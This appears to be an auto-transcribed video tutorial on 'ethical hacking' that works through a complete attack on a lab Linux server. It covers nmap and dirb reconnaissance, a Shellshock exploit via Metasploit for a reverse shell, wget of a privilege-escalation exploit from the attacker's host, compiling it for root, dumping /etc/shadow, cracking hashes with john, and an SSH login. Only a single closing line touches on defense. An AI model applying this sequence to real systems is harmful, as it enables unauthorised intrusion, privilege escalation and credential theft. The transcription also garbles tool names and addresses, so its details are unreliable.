and yesterday we'll be learning
end-to-end article hacking by going
after a specific system and we're
learning step by step what we can do
exactly to scan a device and then after
which to be able to gain complete
control of the entire computer system
and remember kids hacking is illegal if
you want to run any of these radical
hacking techniques do not try it on mr
hackaloy
[Music]
number one we'll be learning about what
we can do in terms of scanning devices
all right so when we scan a device we're
trying to look out for vulnerabilities
and it could be a server it could be a
phone it could be any of these devices
that you're trying to go after number
two what we're trying to do here is to
find a vulnerability inside the system
that we can take advantage of so once we
find a loophole all right we will be
able to gain complete control of the
device and once we're in the question
mark is going to be what else can we do
all right so once you're in what is it
can we can do in terms of post
exploitation all right what can we do to
elevate our privileges to be able to
gain complete control of the system to
even break the password of the computer
so as you can see right here on the left
side we have the hacker computer all
right so this is hacker and what the
hacker want to do is then to be able to
first scan and then loose down all of
those services for example do they have
a file transfer protocol server do they
have a secure shell being opened up do
they have a website running so that we
can take advantage of those weaknesses
within it and so on and so forth and
once we're able to list down all of this
we can get the version and then from
there we can determine all right what
are the different attack methods that we
can go after so right here this is the
place where we'll be thinking and
deciding about what are the different
types of attack methods that we can use
then after which we can launch a target
against say the website okay launch an
attack against into the ftp server into
secure shell whichever the case is once
we have uncovered exploit to use and
once we're in right here into the system
right what we want to do then is to
elevate our privileges so that from a
normal user we now have the ability to
get root access meaning that we can
literally do anything we want with the
device remember smash the like button
and turn on notifications so that you
don't get hacked so right in front of us
we're in call linux and the first thing
you want to do is go ahead and open up
terminal and once you're on terminal
what you want to do right here is to
have the ability to begin scanning the
device or the server or the system
however you want to call it so the first
thing you want to do is enter nmap so
nmap is going to be the tool that we'll
use to help us scan the target device so
here when you enter nmap you can see all
the options are available for us to scan
the device to look out for all the
services so literally like knocking door
on the house trying to scan a house
looking out for openings that we can
then of course be able to jump into the
house and take out for example the cash
and the valuables and the jewelries
right so this is exactly what we'll be
doing as part of launching the attack so
the first thing you want to do is to
scan the ip address all the hostname all
the domain name the goal is that now you
have a target in mind so you can enter
for example the following which is nmap
and what we want to do now is to enter
say 1i2
168.00114 so this is going to be target
device that we're going after so in this
case i can enter dash as follow by v so
this is for the service version that
we're going after dash capital o for the
operating system version so we want to
know whether it is a linux what version
of linux is it if it is a windows
computer what version of windows
computer is it running on and then after
which we want to target the ports so
ports are the services that can be made
available from the target device so in
this case we can target say from port
one all the way to six five five three
five so once you're done with that hit
enter and of course we asked to enter
superuser do all right because it
requires root privileges so enter on
that enter your password hit enter and
now we're scanning the device to look up
for all these different services that
are running on the server and now the
scan is completed so right here you can
see the following all right we have all
this different port numbers all right
followed by the protocol so in this case
there could be protocols like
transmission control protocol and the
state is of course open and you can see
at the same time what kind of service is
it running on is it a file transfer
protocol secure shell all right http ipp
and all of that all right so all of
their services as well as the version on
the most right side so this is a really
wonderful way to quickly identify all
right all of these different services
all of the different versions and once
you have the version you can then
determine what kind of export you want
to use to go after all these different
type of services so that you can have
access into the system and for today's
case we will be targeting on apigee and
so you can see right here we have http
2.4.7 so we'll be targeting the
following so as part of targeted device
all we got to do is just go ahead and
enter the domain name of the ip address
here and you can see right here this is
the directory listing so you can see all
of the directories the files within it
so you can always click around to do
your enumeration and find out right what
is going on so this is a really quick
way for you to look out for all these
different ways and all these different
services that can be helped fd for
example in this case the apogee the web
server level and what we can do next is
jump over to use a tool called dirb so
this is a way for us to be able to look
out for all the different directories
that is held by the server so that we
can possibly look out for some of these
openings which can give us an access
into the server okay so here you can see
the following all right all these are
different options available and you can
just simply enter the following all
right so here we go all these examples
the irb followed by the protocol of
course in this case http and of course
you have the url and of course a
targeted directory so all you got to do
now is enter dirb okay let me go ahead
and clear this
enter d-i-r-b for my http
182.168.0.114. and once you're done with
that go ahead and hit enter and you can
see right here okay we're scanning and
we're looking out for some really
interesting thing and as you can see
we're done so all we're going to do is
scroll all the way back to the top and
look up for any interesting results and
one of those interesting results that we
want to target is the one right here
okay so this is cgi bin and this is a
place where we're going to target the
exploits next up what we really want to
do is to figure out what is really in
cgi bit so all i got to do is enter dirb
followed by slash cgi dash bin slash hit
enter on that so we're trying to figure
out are there any files within it so you
can see right here we have the following
all right we have the cgi bin and of
course we have the hollow world dot sh
so this is the area for us to target and
cgi stands for common gateway interface
and it is a way for the web server to
interact with external content
generating programs and so on and so
forth so we'll be leveraging on this cgi
or for us to be able to gain access into
the system so what we can do now is to
use a really handy tool called mad
splice so you can go ahead and enter
sudo msf console hit enter on that and
this will start up metasploit and what
we are looking out for here in this case
is to look for a exploit that we can use
as part targeting server so all you got
to do is enter search shell shop hit
enter on that and here we have several
options available for us so we'll be
using one of that over here so this is
the one that we'll be targeting to use
so it is going to be under exploit multi
http apigee mod cgi bash environment
execute so all we're going to do now is
enter use all right followed by one and
once you do that you can see the
following all right so we have exploit
multi http apigee mod cgi bash env exec
alright so you can enter show options
specify the option as part of targeting
the server so all we got to do now is go
ahead and take a look at the following
all right so we have the header so we'll
be using the http user agent header so
this is all the values you want to send
so here we have the set r host and of
course we have the arm path and we have
the target uri you have discovered so go
ahead and hit enter on that and the
reason why we need a reverse shell is
because the hacker wants to have taken
advantage of a vulnerability and they
have sent the exploit as well as the
payload what happened is that if they
try to open up a service all right so
when they open up a service so that they
can then finally be able to access over
into the system you realize that they'll
get blocked the reason why they could
get blocked is because there is a
firewall right here so the firewall will
be inspecting all this different traffic
and of course at the same time filter
out all these unnecessary ports that
could be opened up or all these
different services that could be open up
as a result of that what the hackers
want to do is once they have exploited
in the system they want to force a
reverse connection outwards the reason
is because a lot of all these different
firewalls they allow or complete
outbound access all right so meaning
that they do not restrict a lot of all
these different outbound connectivities
to the internet once you're ready in
three
two
one hit exploit and you can see right
here materpata session two open
and we have the following okay
that's it we are in it is game over it's
as simple as that and once we're in i
can enter says info and you can see
the ip address the os the architecture
and all of the data so quickly now what
we want to do is to be able to dump out
the username to passwords within the
computer system so what i can do now is
enter shell and see where we get all
right so once we're in here i can enter
who am i and you notice that we're on
www dash data all right let's see
whether we are going to be able to do a
to cat etc shadow and this is the place
where all this important information
usernames and all this data are there so
we are not able to do that i can enter
pwd so we have preen working directory
so we have fairly limited access into
the system no worries i will teach you
how we can elevate our privileges in the
system so here we have pretty good
example all right so here we have the
following of 2021
0903 and we have 37292.c
all right so this is the one we'll be
using as part of sending and uploading
into the server so that we can elevate
our privileges okay so all we're going
to do now is enter say torch
37 292.c okay once you're entered on
that you can enter say mousepad 37292.c
hit enter on that and all you got to do
is just literally just copy and paste
whatever you're seeing right here and go
ahead and send it over into the file so
save it into file and once you're done
with that go ahead and close mousepad
and what we can do now is jump back over
into terminal right and what we can do
is go back into interpreter and what we
can do next is to upload the file so
once we're in interpreter all we're
going to do is enter upload all right
followed by slash loyalian desktop slash
37292.c
hit enter on that and see the following
operation fail and the reason why you
may be getting this is because we do not
have right permission so if i go and
enter shell so we're in right now so i
enter pwd if i try to do say torch
abc all right hit enter and that cannot
touch abc permission denied so we can
exit from here and now what we can do is
to think about whether we can upload
this file into our own server and then
after which
from all right target or the session
that we currently have download the file
and be able to run some
other directories so going back into
another terminal all you're going to do
is enter sudo systemctl all right fold
by start
apogee2.service hit enter on that
enter your password and this would help
us start up
the apigee server so that we can host
our malicious file so what you can do
now is go ahead and enter copy
37292 into var www.html slash hit enter
on that so done we're able to now host
this file over and then the target user
can now download that file so what i can
do now is go ahead and say cd over slash
tam all right so this is a directory
that's available in pretty much all of
the linux servers so that we can write a
temporary file in so what i can do now
is go ahead do the following enter shell
and to wget http 1i2
168.0.192 followed by slash all right
37292.c hit enter and that
oh my are you seeing that we just
downloaded the file meaning that we are
now able to execute on this by doing the
following okay so all we're going to do
now is enter gcc37292.c
and then we want to output this over to
say follow ofs okay so done and next up
we can do a chmod plus x to make this
executable ofs done enter dot slash ofs
hit enter on that
guess what all right who am i
we got root we're in we have complete
control over the entire system so what
we want to do now is to be able to break
the username and passwords on the linux
server yes i know this is pretty crazy
stuff so what i can do now is go ahead
and enter say cat etc shadow hit enter
on that and we have all these different
details and you can save them all up
into a file alright so in this case we
can save all of this into a shadow file
on kala linux next up what we want to do
is enter cad etc passwd hit enter on
that as well and likewise we want to
save this all right over into a file on
kali linux so that we can do our
password breaking so i've already saved
up the file and you'll be able to see
the following so i can do a cat
shadow all right hit enter on that and
we can see all right the exact same file
right here and we have many interesting
uses like anakin skywalker darth vader
all these really interesting star wars
characters so next up what we can do is
likewise we can do a cam passwd all
right so here same thing we're seeing
all the exact same copy from the linux
server over into a collection machine so
what we can do next is to go ahead and
enter on shadow all right followed by
passwd followed by shadow and then what
we can do now is i'll put it into
unshadowed dot txt all right so go ahead
and hit enter on that
alright so done okay what we can do next
is to use john john is going to be a
password cracking software it will use
as part of breaking into that file so
what we can do now is enter john full by
the word list equal all right so in this
case we can enter usr
share word lists follow my rockq.txt
okay and then after which target the
unshadow.txt
and then three
two one hit enter on that
you can see the following okay over here
it states loaded one password hash okay
so all we're gonna do right now is just
do the following by entering show so you
can enter john
show now we can enter unshadowed dot txt
hit enter on that we got a following
here okay so we got vagrant vagrant so
here we got the username as well as the
password field just like that remember
earlier we had a secure shell service
that's available so what we can do now
is go ahead and enter ssh vargrand at
192 168.0.114
and hit enter on that now we can enter
the password all right which is vanguard
as well what the heck we are in we have
a connection over into the linux server
using a broken username and password in
terms of defense it's really important
and critical to always be testing
scanning your different servers that you
have because they could be hosting a lot
of production workloads and you want to
ensure that there's no misconfiguration
there is no miss security patches so
that all this different type of exploits
cannot be easily conducted against your
servers so once again i hope you learned
something valuable in today's tutorial
so like share subscribe and turn on
notifications so that you can be kept
abreast of the latest article hacking
tutorials
